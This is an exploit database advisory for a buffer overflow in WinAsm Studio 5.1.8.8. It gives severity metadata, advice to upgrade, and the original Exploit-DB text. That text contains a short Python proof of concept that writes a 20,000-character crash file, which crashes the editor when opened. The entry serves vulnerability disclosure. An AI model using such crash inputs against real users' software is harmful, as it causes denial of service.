WinAsm Studio 5.1.8.8 BOF

vendor:

WinAsm Studio

by:

Un_N0n

7,8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: WinAsm Studio

Affected Version From: 5.1.8.8

Affected Version To: 5.1.8.8

Patch Exists: Yes

Related CWE: N/A

CPE: a:winasm:winasm_studio

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7 x64(64bit)

2015

WinAsm Studio 5.1.8.8 is vulnerable to a buffer overflow vulnerability when a specially crafted string is passed to the DrawTextExA() function. This can be exploited to cause a denial of service condition when a maliciously crafted file is opened in the application.

Mitigation:

Upgrade to the latest version of WinAsm Studio.

Source

Exploit-DB raw data:

********************************************************************************************
# Exploit: WinAsm Studio 5.1.8.8 BOF. 
# Date: 12/6/2015
# Exploit Author: Un_N0n
# Vendor: WinAsm
# Software Link: http://www.winasm.net/winasm-studio-updates.html
# Version: 5.1.8.8
# Tested on: Windows 7 x64(64bit)
********************************************************************************************
[Info]

Code: 
rc.right = 0;
rc.bottom = 0;
  DrawTextExA(
    hdc,
    L"I \t\u6e69\u6c63\u6475e\u6e69\.................\uf64)", <--- XXXtremely big string to draw, thus crashes.
    1,
    &rc,
    0x2CE0u,
    &dtp);
*(_DWORD *)(a1 + 420) = rc.right;


[How to?]
1 - Open up WinAsm.exe.
2 - GoTo Files -> Open Files.
3 - Browser the crash.txt in it.
~ Software will Crash.

[crash.txt?]
file = open('crash.txt','w')
file.write("A"*20000)       #Crash.txt Contains 20000s As
file.close()

********************************************************************************************